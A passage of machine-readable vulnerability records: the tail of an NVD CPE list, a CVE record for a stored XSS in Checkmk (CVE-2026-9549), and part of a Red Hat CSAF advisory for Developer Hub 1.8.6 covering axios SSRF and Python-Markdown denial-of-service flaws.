"1B9B340D-84F6-4CE9-A627-E26F340B3705"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p23:*:*:*:*:*:*", "matchCriteriaId": "CCAD0F84-7273-4FDF-B238-177E1C4D5F5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p24:*:*:*:*:*:*", "matchCriteriaId": "860D2E5C-6277-44F5-A3FE-C085F76B8514"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p25:*:*:*:*:*:*", "matchCriteriaId": "FAEB7D48-C80F-4804-8E76-C950B9714533"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p26:*:*:*:*:*:*", "matchCriteriaId": "6CF72A28-8A7D-412D-8B20-2D50DE613F80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p27:*:*:*:*:*:*", "matchCriteriaId": "0C680E16-A5D5-4847-86D5-A0D99472CD27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p28:*:*:*:*:*:*", "matchCriteriaId": "B78EC3D8-4FE2-4CAE-AAD0-BF0701945F6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p29:*:*:*:*:*:*", "matchCriteriaId": "93D6757C-F17F-49D7-8C5E-2DB5F0DE5764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p3:*:*:*:*:*:*", "matchCriteriaId": "74F78C48-030A-48A1-B69E-04C4EA5CCC12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p30:*:*:*:*:*:*", "matchCriteriaId": "DC31DE74-ED72-478F-9762-CACF26B31A6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p4:*:*:*:*:*:*", "matchCriteriaId": "8701A914-774B-4E3B-A651-4A9FD19A187A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p5:*:*:*:*:*:*", "matchCriteriaId": "19E40054-C44D-4C4C-B077-0333D8201E5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p6:*:*:*:*:*:*", "matchCriteriaId": "0E2D2F49-32B2-42AA-B99E-7C39403CF104"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p7:*:*:*:*:*:*", "matchCriteriaId": "ACE440F8-EBF5-4DBB-A215-57D770C66219"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p8:*:*:*:*:*:*", "matchCriteriaId": "1A94395D-DDCE-4977-89CA-46F71C3CA2B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p9:*:*:*:*:*:*", "matchCriteriaId": "9513876C-8DF0-4A59-864F-8401BAA43376"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "7797AFCE-3FF9-497C-AEA9-D6CF170F056D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:*", "matchCriteriaId": "F8943BB3-1487-494C-B4EB-89EB0B18B6A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:*", "matchCriteriaId": "5342045D-CB9F-4663-9538-8B657C9AC833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:*", "matchCriteriaId": "E9566834-D4EE-4104-AD60-7988FCF17224"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p1:*:*:*:*:*:*", "matchCriteriaId": "F53BB4AD-54A6-4A77-868A-D6972DDF0EAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p2:*:*:*:*:*:*", "matchCriteriaId": "0405E40E-7969-49B3-90EC-98A982464275"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p3:*:*:*:*:*:*", "matchCriteriaId": "629E039F-1C52-48DF-A952-11220A890AC2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p4:*:*:*:*:*:*", "matchCriteriaId": "CDC5BD88-F1D9-4ED4-81AA-3E6CD9AF16A8"}]}]}], "references": [{"url": "https://checkmk.com/werk/17993", "source": "security@checkmk.com", "tags": ["Vendor Advisory"]}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "fkie_cve-2026-9549"}]}}}, {"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2026-9549", "assignerOrgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "state": "PUBLISHED", "assignerShortName": "Checkmk", "dateReserved": "2026-05-26T07:04:28.900Z", "datePublished": "2026-06-08T12:07:12.356Z", "dateUpdated": "2026-06-08T13:02:20.748Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Checkmk", "vendor": "Checkmk GmbH", "versions": [{"lessThan": "2.5.0p5", "status": "affected", "version": "2.5.0", "versionType": "semver"}, {"lessThan": "2.4.0p31", "status": "affected", "version": "2.4.0", "versionType": "semver"}, {"lessThan": "2.3.0p48", "status": "affected", "version": "2.3.0", "versionType": "semver"}, {"status": "affected", "version": "2.2.0", "versionType": "semver"}]}], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the service discovery active check output in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can configure active or custom checks to inject malicious HTML or JavaScript into check output that executes in the browser of an admin or a user with host read permissions when they run the check on the service discovery page."}], "impacts": [{"capecId": "CAPEC-592", "descriptions": [{"lang": "en", "value": "CAPEC-592: Stored XSS"}]}], "metrics": [{"cvssV4_0": {"baseScore": 4.8, "baseSeverity": "MEDIUM", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N", "version": "4.0"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "shortName": "Checkmk", "dateUpdated": "2026-06-08T12:07:12.356Z"}, "references": [{"url": "https://checkmk.com/werk/17993", "tags": ["vendor-advisory"]}], "title": "Fix XSS in service discovery active check output", "cpeApplicability": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.0", "versionEndExcluding": "2.5.0p5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.0p31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.0p48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:*:*:*:*:*:*:*"}]}]}], "x_generator": {"engine": "cvelib 1.8.0"}, "x_gcve": [{"recordType": "advisory", "vulnId": "cve-2026-9549"}]}, "adp": [{"metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2026-06-08T13:02:10.372370Z", "id": "CVE-2026-9549", "options": [{"Exploitation": "none"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2026-06-08T13:02:20.748Z"}}]}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "Red Hat Developer Hub 1.8.6 has been released.", "title": "Topic"}, {"category": "general", "text": "Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9742", "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-62718", "url": "https://access.redhat.com/security/cve/CVE-2025-62718"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-69534", "url": "https://access.redhat.com/security/cve/CVE-2025-69534"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-69873", "url": "https://access.redhat.com/security/cve/CVE-2025-69873"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-1525", "url": "https://access.redhat.com/security/cve/CVE-2026-1525"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-1526", "url": "https://access.redhat.com/security/cve/CVE-2026-1526"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-1528", "url": "https://access.redhat.com/security/cve/CVE-2026-1528"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-2229", "url": "https://access.redhat.com/security/cve/CVE-2026-2229"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-25679", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-26996", "url": "https://access.redhat.com/security/cve/CVE-2026-26996"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-27601", "url": "https://access.redhat.com/security/cve/CVE-2026-27601"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-27904", "url": "https://access.redhat.com/security/cve/CVE-2026-27904"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-29063", "url": "https://access.redhat.com/security/cve/CVE-2026-29063"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-29074", "url": "https://access.redhat.com/security/cve/CVE-2026-29074"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-29186", "url": "https://access.redhat.com/security/cve/CVE-2026-29186"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-3118", "url": "https://access.redhat.com/security/cve/CVE-2026-3118"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-32141", "url": "https://access.redhat.com/security/cve/CVE-2026-32141"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33036", "url": "https://access.redhat.com/security/cve/CVE-2026-33036"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33228", "url": "https://access.redhat.com/security/cve/CVE-2026-33228"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33891", "url": "https://access.redhat.com/security/cve/CVE-2026-33891"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33894", "url": "https://access.redhat.com/security/cve/CVE-2026-33894"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33895", "url": "https://access.redhat.com/security/cve/CVE-2026-33895"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-33896", "url": "https://access.redhat.com/security/cve/CVE-2026-33896"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-39983", "url": "https://access.redhat.com/security/cve/CVE-2026-39983"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-40175", "url": "https://access.redhat.com/security/cve/CVE-2026-40175"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-4800", "url": "https://access.redhat.com/security/cve/CVE-2026-4800"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-4926", "url": "https://access.redhat.com/security/cve/CVE-2026-4926"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/", "url": "https://access.redhat.com/security/updates/classification/"}, {"category": "external", "summary": "https://catalog.redhat.com/search?gs&searchType=containers&q=rhdh", "url": "https://catalog.redhat.com/search?gs&searchType=containers&q=rhdh"}, {"category": "external", "summary": "https://developers.redhat.com/rhdh/overview", "url": "https://developers.redhat.com/rhdh/overview"}, {"category": "external", "summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub", "url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHDHBUGS-2288", "url": "https://issues.redhat.com/browse/RHDHBUGS-2288"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHDHBUGS-2947", "url": "https://issues.redhat.com/browse/RHDHBUGS-2947"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHDHBUGS-2972", "url": "https://issues.redhat.com/browse/RHDHBUGS-2972"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12327", "url": "https://issues.redhat.com/browse/RHIDP-12327"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12388", "url": "https://issues.redhat.com/browse/RHIDP-12388"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12419", "url": "https://issues.redhat.com/browse/RHIDP-12419"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12511", "url": "https://issues.redhat.com/browse/RHIDP-12511"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12568", "url": "https://issues.redhat.com/browse/RHIDP-12568"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12647", "url": "https://issues.redhat.com/browse/RHIDP-12647"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12650", "url": "https://issues.redhat.com/browse/RHIDP-12650"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12655", "url": "https://issues.redhat.com/browse/RHIDP-12655"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12666", "url": "https://issues.redhat.com/browse/RHIDP-12666"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12686", "url": "https://issues.redhat.com/browse/RHIDP-12686"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12784", "url": "https://issues.redhat.com/browse/RHIDP-12784"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12880", "url": "https://issues.redhat.com/browse/RHIDP-12880"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12887", "url": "https://issues.redhat.com/browse/RHIDP-12887"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12921", "url": "https://issues.redhat.com/browse/RHIDP-12921"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12930", "url": "https://issues.redhat.com/browse/RHIDP-12930"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-12996", "url": "https://issues.redhat.com/browse/RHIDP-12996"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13105", "url": "https://issues.redhat.com/browse/RHIDP-13105"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13107", "url": "https://issues.redhat.com/browse/RHIDP-13107"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13130", "url": "https://issues.redhat.com/browse/RHIDP-13130"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13180", "url": "https://issues.redhat.com/browse/RHIDP-13180"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13182", "url": "https://issues.redhat.com/browse/RHIDP-13182"}, {"category": "external", "summary": "https://issues.redhat.com/browse/RHIDP-13185", "url": "https://issues.redhat.com/browse/RHIDP-13185"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9742.json"}], "title": "Red Hat Security Advisory: Red Hat Developer Hub 1.8.6 release.", "tracking": {"current_release_date": "2026-06-08T15:52:56+00:00", "generator": {"date": "2026-06-08T15:52:56+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9742", "initial_release_date": "2026-04-22T14:56:38+00:00", "revision_history": [{"date": "2026-04-22T14:56:38+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-22T14:56:41+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:56+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Developer Hub 1.8", "product": {"name": "Red Hat Developer Hub 1.8", "product_id": "Red Hat Developer Hub 1.8", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhdh:1.8::el9"}}}], "category": "product_family", "name": "Red Hat Developer Hub"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "product": {"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "product_identification_helper": {"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3Abb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9?arch=amd64&repository_url=registry.redhat.io/rhdh&tag=1776784286"}}}, {"category": "product_version", "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64", "product": {"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64", "product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64", "product_identification_helper": {"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3Af09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c?arch=amd64&repository_url=registry.redhat.io/rhdh&tag=1776783947"}}}, {"category": "product_version", "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "product": {"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "product_identification_helper": {"purl": "pkg:oci/rhdh-operator-bundle@sha256%3Ab40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331?arch=amd64&repository_url=registry.redhat.io/rhdh&tag=1776787729"}}}], "category": "architecture", "name": "amd64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64 as a component of Red Hat Developer Hub 1.8", "product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"}, "product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "relates_to_product_reference": "Red Hat Developer Hub 1.8"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64 as a component of Red Hat Developer Hub 1.8", "product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64"}, "product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "relates_to_product_reference": "Red Hat Developer Hub 1.8"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64 as a component of Red Hat Developer Hub 1.8", "product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"}, "product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64", "relates_to_product_reference": "Red Hat Developer Hub 1.8"}]}, "vulnerabilities": [{"cve": "CVE-2025-62718", "cwe": {"id": "CWE-1289", "name": "Improper Validation of Unsafe Equivalence in Input"}, "discovery_date": "2026-04-09T15:01:48.111177+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2456913"}], "notes": [{"category": "description", "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not correctly handle hostname normalization when evaluating NO_PROXY rules. An attacker can exploit this by crafting requests to loopback addresses (e.g., localhost. or [::1]) which bypass the NO_PROXY configuration and are routed through the configured proxy. This can lead to Server-Side Request Forgery (SSRF) vulnerabilities, enabling attackers to access sensitive internal or loopback services that should otherwise be protected.", "title": "Vulnerability description"}, {"category": "summary", "text": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization", "title": "Vulnerability summary"}, {"category": "other", "text": "This flaw has limited impact due to combination of non-default conditions to exploit: the attacker must be able to control or influence URLs passed to axios in a server-side context, the application must have both `HTTP_PROXY` and `NO_PROXY` configured, and the proxy itself must be positioned to act on the misdirected traffic or have been compromised by the attacker to intercept the rerouted traffic.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-62718"}, {"category": "external", "summary": "RHBZ#2456913", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718", "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1", "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2", "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"}, {"category": "external", "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df", "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"}, {"category": "external", "summary": "https://github.com/axios/axios/pull/10661", "url": "https://github.com/axios/axios/pull/10661"}, {"category": "external", "summary": "https://github.com/axios/axios/releases/tag/v1.15.0", "url": "https://github.com/axios/axios/releases/tag/v1.15.0"}, {"category": "external", "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5", "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"}], "release_date": "2026-04-09T14:31:46.067000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"}, {"cve": "CVE-2025-69534", "cwe": {"id": "CWE-617", "name": "Reachable Assertion"}, "discovery_date": "2026-03-05T16:01:10.432461+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2444839"}], "notes": [{"category": "description", "text": "A flaw was found in Python-Markdown. Parsing crafted markdown content containing malformed HTML-like sequences causes html.parser.HTMLParser to raise an unhandled AssertionError. This unhandled exception allows an attacker to cause an application crash and potentially disclose sensitive information via its stack trace.", "title": "Vulnerability description"}, {"category": "summary", "text": "python-markdown: denial of service via malformed HTML-like sequences", "title": "Vulnerability summary"}, {"category": "other", "text": "To exploit this flaw, an attacker must be able to supply a specially crafted payload to be processed by an application using Python-Markdown. Additionally, the security impact of this vulnerability is limited to an information disclosure via the unhandled exception stack trace and a denial of service. There is no memory corruption or arbitrary command execution. Due to these reasons, this issue has been rated with an important severity.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": 